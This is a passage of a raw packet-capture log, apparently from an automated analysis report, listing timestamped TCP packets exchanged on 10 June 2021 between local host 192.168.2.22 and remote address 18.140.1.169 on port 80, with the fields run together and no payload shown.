                                  Jun 10, 2021 15:24:51.320414066 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320416927 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320432901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320436954 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320450068 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320461988 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320466042 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320486069 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320492029 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320511103 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320517063 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320537090 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320542097 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320561886 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320569038 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320590019 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320590973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320616007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320626020 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320641041 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320647955 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320666075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320672989 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320688963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320712090 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320714951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320722103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320736885 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320744038 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320760965 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320770979 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320789099 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320792913 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320813894 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320820093 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320837975 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320846081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320863008 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320869923 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320885897 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320894003 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320910931 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320929050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320935011 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320944071 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320956945 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320971966 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.320982933 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.320986032 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321006060 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321013927 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321028948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321038008 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321052074 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321052074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321077108 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321084023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321099997 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321106911 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321122885 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.321130991 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.321152925 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.322458029 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.504703999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504729986 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504751921 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504775047 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504796982 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504817963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504844904 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504848957 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.504875898 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.504878998 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.504884958 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.504887104 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.505129099 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507601023 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507627964 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507651091 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507677078 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507685900 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507693052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507705927 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507711887 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507721901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507735968 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507738113 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507759094 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507771969 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507786036 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507786989 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507810116 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507821083 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507833004 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507844925 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507858992 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507862091 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507880926 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507890940 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507901907 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507904053 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507925034 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507932901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507951975 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507951975 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.507962942 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.507986069 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508002043 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508008003 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508016109 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508028984 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508037090 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508052111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508063078 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508074045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508080959 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508095026 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508104086 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508117914 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508126020 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508141041 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508143902 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508166075 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508176088 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508188963 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508189917 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508212090 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508222103 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508234024 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508234024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508256912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508265972 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508280039 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508281946 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508301973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508311987 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508323908 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508327007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508349895 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508359909 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508371115 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508373022 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508393049 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508404016 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508414984 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508420944 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508434057 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508456945 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508466005 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508480072 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508481026 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.508490086 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.508516073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.509412050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.689766884 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689809084 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689835072 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689860106 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689883947 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689907074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.689908028 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884124041 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884138107 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884144068 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884152889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884162903 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884179115 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884182930 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884196043 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884201050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884210110 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884212971 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884229898 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884232044 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884246111 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884246111 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884259939 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884262085 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884274006 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884283066 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884296894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884300947 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884313107 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884318113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884332895 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884335041 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884345055 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884352922 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884365082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884368896 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884386063 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884387016 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884401083 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884402990 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884417057 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884423971 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884433985 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884442091 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884458065 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884462118 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884474039 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884475946 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884488106 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884490967 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884502888 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884506941 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884516954 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884522915 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884536982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884540081 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884550095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884562016 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884572029 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884586096 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884598970 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884603024 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884613991 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884619951 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884629965 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884637117 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884654045 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884655952 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884670973 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.884670973 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884684086 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.884701014 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885637999 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885654926 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885672092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885687113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885703087 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885704041 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885720015 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885724068 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885729074 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885732889 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885755062 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885756969 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885772943 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885788918 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885795116 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885806084 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885812998 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885828972 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885833025 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885840893 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885847092 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885860920 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885864019 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885873079 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885881901 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885898113 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885900021 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885909081 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885915041 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885929108 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885931969 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885941982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885965109 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.885972023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.885984898 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886001110 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886008978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886017084 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886018038 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886032104 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886035919 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886055946 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886055946 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886069059 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886075020 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886091948 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886096001 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886109114 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886121988 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886130095 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886135101 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886153936 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886153936 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886158943 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886168957 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886172056 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886182070 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886188030 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886208057 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886212111 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886220932 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886225939 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886241913 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886245966 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886259079 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886262894 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886274099 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886276007 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886290073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886300087 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886303902 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886323929 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886339903 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886347055 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886354923 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886367083 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886378050 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886384010 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886394978 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886399984 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886414051 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886416912 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886434078 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886435032 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886450052 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886450052 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886465073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886467934 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886482000 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886485100 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886496067 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886504889 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886508942 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886523008 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886538029 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886542082 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886554956 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886554956 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886569023 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886573076 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886585951 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886589050 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886600018 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886605978 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886620998 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886621952 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886635065 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886641979 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886650085 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886660099 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886676073 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886676073 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886689901 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886694908 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886712074 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886713982 CEST4916580192.168.2.2218.140.1.169
                                  Jun 10, 2021 15:24:51.886728048 CEST804916518.140.1.169192.168.2.22
                                  Jun 10, 2021 15:24:51.886730909 CEST4916580192.168.2.2218.140.1.169
